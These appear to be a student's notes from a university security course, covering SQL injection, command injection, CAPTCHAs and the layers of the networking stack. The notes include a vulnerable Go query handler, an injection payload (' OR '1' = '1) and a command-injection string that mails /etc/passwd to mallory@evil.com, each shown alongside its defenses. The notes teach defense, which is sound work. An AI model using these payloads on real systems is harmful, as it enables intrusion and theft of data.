CS 161 Notes Lec 15-16

Overview

Lecture 15: SQL Injection and CAPTCHAs
  1. Structure of modern web services

  2. SQL injection
    1. Defenses
  3. Command injection
    1. Defenses
  4. CAPTCHAs
    1. Subverting CAPTCHAs
Lecture 16: Intro to Networking
  1. Internet: A global network of computers

  2. OSI model: A layered model of protocols

    1. Layer 1: Physical layer

    2. Layer 2: Link layer

    3. Layer 3: Network layer

    4. Layer 4: Transport layer

    5. Layer 7: Application layer

    6. Overview

Structure of modern web services

Most websites need to store data, which involves something called “database server”. The structure of a modern website is usually client+web server+database server.

The way these three components communicate is shown in the diagram above. There’s a lot of relevant knowledge for database system, but for this course, we only need to know about the structure is that web server will communicate with database for data in a language called SQL(Structured Query Language).

SQL injection

So, what is SQL, the language that web server uses to communicate with database server?

SQL stands for Structured Query Language, it’s a language used to manage data held in a relational database management system.

With SQL, you can

  1. Create/delete databases.

  2. Create/delete tables and specify the columns in it.

  3. Add/delete records.

  4. Query records with specific properties.

  5. Sort records by specific rules.

In a relational database management system(RDBMS), there’re typically some databases, each containing some tables that store data. Data stored in different tables can be related in some ways(e.g. a table with student information and another table with course enrollment records).

A typical table may look like this,

bots
idnamelikesage
1evanbotpancakes3
2codabothashes2.5
3pintobotbeans1.5

Also note that SQL is a declarative language, which means that its code will only claim the result user wants instead of specifying how the task should be done. In contrast, there’s something called imperative languages, which specifies how the task should be done, examples include C, Python, Go…

There’s a crash course of SQL instructions in the lecture, including the following instructions,

  1. SELECT

  2. WHERE

  3. INSERT INTO

  4. UPDATE

  5. DELETE

  6. CREATE

  7. DROP

Learning these instructions is definitely necessary for understanding SQL injection, but I’m not gonna include the details of this crash course since I’m assuming you might have learned that already in some other courses. If you haven’t, the relevant slides can be found here.

Now let’s introduce SQL injection,

  • SQL injection is injecting SQL into queries constructed by the server to cause malicious behavior.

  • It allows the attacker to execute arbitrary SQL on the SQL server!

    • Leak data.

    • Modify records.

    • Delete records/tables.

    • Basically anything that the SQL server can do…

Here’s an example of how SQL injection might be performed,

Consider a Go HTTP handler

func handleGetItems(w http.ResponseWriter, r *http.Request) {
    itemName := r.URL.Query()["item"][0]
    db := getDB()
    query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
    row, err := db.QueryRow(query)
    ...
}

Now imagine if the attacker makes the following request,

https://vulnerable.com/get-items?item=' OR '1' = '1

What will be executed as a SQL query is

SELECT item, price FROM items WHERE name = '' OR '1' = '1'

Similarly, the attacker can also replace the injected instruction with whatever other malicious queries.

Blind SQL injection

Well, one thing to notice is that not all SQL queries are used in a way that is visible to the user. For example, in the case of password verification, the SQL will just compare the hash result with the record stored in the database and return a true/false.

We call this “blind SQL injection”, meaning that SQL injection attacks where little to no feedback is provided.

SQL injection defenses
  • Input sanitization
    • Option #1: Disallow special characters

    • Option #2: Escape special characters
      • Like XSS, SQL injection relies on certain characters that are interpreted specially.

      • SQL allows special characters to be escaped with backslash (\) to be treated as data.

    • Drawback:
      • Difficult to build a good escaper that handles all edge cases.
    • It’s a good defense-in-depth measure.

An example of input sanitization:

func handleGetItems(w http.ResponseWriter, r *http.Request) {
    itemName := r.URL.Query()["item"][0]
    itemName = sqlEscape(itemName)
    db := getDB()
    query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
    row, err := db.QueryRow(query)
    ...
}
  • Prepared statements
    • Usually represented as a question mark (?) when writing SQL statements.

    • Idea: Instead of trying to escape characters before parsing, parse the SQL first, then insert the data
      • When the parser encounters the ?, it fixes it as a single node in the syntax tree.

      • After parsing, only then, it inserts data.

      • The untrusted input never has a chance to be parsed, only ever treated as data.

    • Biggest downside to prepared statements: Not part of the SQL standard!
      • Instead, SQL drivers rely on the actual SQL implementation (e.g. MySQL, PostgreSQL, etc.) to implement prepared statements.

An example of prepared statements:

func handleGetItems(w http.ResponseWriter, r *http.Request) {
    itemName := r.URL.Query()["item"][0]
    db := getDB()
    row, err := db.QueryRow("SELECT name, price FROM items WHERE name = ?", itemName)
    ...
}

Command injection

To generalize what we’ve seen in SQL injection, we consider the scenario where untrusted data is treated incorrectly by the web server, and it can be parsed as a malicious command. This is called “command injection”.

An example of command injection would be system function in C language.

Consider the following snippet,

void find_employee(char *regex) {
    char cmd[512];
    snprintf(cmd, sizeof(cmd), "grep '%s' phonebook.txt", regex);
    system(cmd);
}

If the input for regex is

regex = "'; mail mallory@evil.com < /etc/passwd; touch '"

then the real parameter will be executed by system function is

grep ''; mail mallory@evil.com < /etc/passwd; touch '' phonebook.txt

This will cause the password file to be sent to mallory@evil.com.

Command injection defenses
  1. Input sanitization
    • As before, this is hard to implement and difficult to get 100% correct.
  2. Use safe APIs
    • In general, remember the KISS principle: Keep It Simple, Stupid.

    • For system, executing a shell to execute a command is too powerful!
      • Instead, use execv, which directly executes the program with arguments without parsing.
    • Most programming languages have safe APIs that should be use instead of parsing untrusted input
      • system (unsafe) and execv (safe) in C.

      • os.system (unsafe) and subprocess.run (safe) in Python.

      • exec.Command (safe) in Go.

        • Go only has the safe version!

CAPTCHAs

CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart. Sounds confusing? Just take a look at this picture,

You definitely have met similar things before!

The goal of such tests is to prevent robots from easily accessing the website, who may perform spamming or other kinds of attacks.

A fun fact is that CAPTCHA results are sometimes used for machine learning training.

  • Machine learning often requires manually-labeled datasets.

  • CAPTCHAs crowdsource human power to help manually label these big datasets.

  • Example: Machine vision problems require manually-labeled examples: “This is a stop sign”.

Here’s a comic related to such usage :)

While they’re certain issues related to CAPTCHAs:

  • Arms race: As computer algorithms get smarter, CAPTCHAs need to get harder

  • Accessibility: As CAPTCHAs get harder, not all humans are able to solve them easily

  • Ambiguity: CAPTCHAs might be so hard that the validator doesn’t know the solution either!

  • Not all bots are bad: CAPTCHAs can distinguish bots from humans, but not good bots from bad bots

    • Example: Crawler bots help archive webpages
Subverting CAPTCHAs

The easiest way to attack CAPTCHA?

Pay humans to solve them for you! ;)

Every time when spamming bots meet such CAPTCHAs, they’ll send them to human workers, who can quickly solve the tests and let the bots continue attacking!

However, this does cost the money for paying people to do the tests for attackers, so in the sense that security is raising the cost for attacks, CAPTCHA is a good method of defense.

Internet: A global network of computers

What is network? What’s the Internet?

  • Network is a set of connected machines that can communicate with each other.
    • Machines on the network agree on a protocol, a set of rules for communication.
  • Internet is a global network of computers.
    • The web sends data between browsers and servers using the Internet.

    • The Internet can be used for more than the web (e.g. SSH).

What is a protocol?

  • A protocol is an agreement on how to communicate that specifies syntax and semantics.
    • Syntax: How a communication is specified and structured (format, order of messages).

    • Semantics: What a communication means (actions taken when sending/receiving messages).

OSI model: A layered model of protocols

In this part, I will include some extra materials for a better understanding of network layers.

Internet is constructed based on many layers of protocols, also called network protocol stack. As the name indicates, the protocols pile like a stack, each layer has its own protocol.

Below is a graph that shows how Alice might send Bob a message through the layer of secretary and mail system.

The network protocol stack works quite similarly as the messaging system above.

We will start with introducing OSI model.

  • OSI stands for Open Systems Interconnection model, it’s a conceptual model of Internet.

  • In the OSI reference model, the communications between a computing system are split into seven different abstraction layers: Physical, Data Link, Network, Transport, Session, Presentation, and Application.

  • However, in this course, we just consider five of these layers, since Session and Presentation layers are not used in the real world.

Layer 1: Physical layer

This is the lowest layer in the network protocol stack, where data really gets transmitted.

  • It defines how the bits will be sent from one device to another.

  • It can be
    • Patterns of voltage levels

    • Photon intensities

    • RF modulation

  • The protocol defines things including
    • Hardware equipment

    • Cabling

    • Wiring

    • Frequencies

    • Pulses

  • Examples:
    • Wi-Fi radios (IEEE 802.11)

    • Ethernet voltages (IEEE 802.3)

Link involves sending frames directly from one device to another.

A frame is a digital data transmission unit. In packet switched systems, a frame is a simple container for a single network packet.

Packet switching is a method of grouping data into packets that are transmitted over a digital network. Packets are made of a header and a payload.

Frames must contain three things:

  • Source (“Who is this message coming from?”).

  • Destination (“Who is this message going to?”).

  • Data (“What does this message say?”).

With Layer 2, we can enable communication in a LAN(Local Area Network):

  • A set of computers on a shared network that can directly address(using MAC address) one another.

  • In reality, computers aren’t all connected to the same wire.
    • Instead, local networks are a set of point-to-point links.

Another important concept to introduce in layer 2 is Ethernet.

  • Ethernet is a common layer 2 protocol that most endpoint devices use.

  • It was first standardized in 1983 as IEEE 802.3.

  • Systems communicating over Ethernet divide a stream of data into shorter pieces called frames. Each frame contains source and destination addresses, and error-checking data so that damaged frames can be detected and discarded.

Lastly, we introduce MAC address,

  • MAC stands for Media Access Control.

  • MAC address is a 6-byte address that identifies a piece of network equipment.

  • It’s unique for each physical device.

  • Typically written in hexadecimal form.

  • The first 3 bytes are assigned to manufacturers (i.e. who made the equipment).
    • This is useful in identifying a device.
  • The last 3 bytes are device-specific.

  • Most of the IEEE 802 networking techniques use MAC address, including Ethernet, Wi-Fi, and Bluetooth.
Layer 3: Network layer

This is the layer that deals with network packets. Recall that link layer deals with frames, which are one-to-one containers of packets.

Based on link layer, which enables computers communicate within a LAN, the network layer enables larger scale communication, with the help of routers.

Routers will forward a given packet to the next hop(for now, we just assume they can figure out where to forward the packet).

Communication protocols used between routers and inside LAN can be different, but the end-to-end communication uses the layer 3 protocol, a common one is Internet protocol(IP).

So, what is IP?

  • As the name indicates, this protocol is used by all devices that communicate via Internet.

  • IP has the task of delivering packets from the source host to the destination host solely based on the IP addresses in the packet headers.

  • With this goal in mind, we know that each packet should contain
    • Source (“Who is this message coming from?”)

    • Destination (“Who is this message going to?”)

    • Data (“What does this message say?”)

  • IP address is the address that identifies a device on the Internet.
    • IPv4 is 32 bits, typically written as 4 decimal octets, e.g. 35.163.72.93.

    • IPv6 is 128 bits, typically written as 8 groups of 2 hex bytes: 2607:f140:8801::1:23.

    • If digits or groups are missing, fill with 0’s, so 2607:f140:8801:0000:0000:0000:0001:0023.

Here’s how a IPv4 packet looks like,

Also note that IP does not provide reliability! It only tries to deliver packets, but doesn’t care if the packets are lost, corrupted, or delivered out of order.

Layer 4: Transport layer

The transport layer provides transportation of variable-length data from any point to any other point.

Two important ideas involved in this layer are

  • Reliability
    • The data will be transmitted in order.

    • A reliable protocol notifies the sender whether or not the delivery of data to intended recipients was successful.

    • TCP is reliable.

    • UDP is unreliable.

  • Port
    • When you want a machine do multiple kinds of communication, a good choice is to separate these tasks by assigning them ports.

    • Ports can be understood as providing more address under an IP address.

Layer 7: Application layer

Every online application is layer 7.

  • Web browsing

  • Online video games

  • Messaging services

  • Video calls (Zoom)

HTTP is the predominant Layer 7 protocol for website traffic on the Internet.

Overview

Here’s a gif showing the communication through network protocol stack,

Written on May 10, 2023
Loading...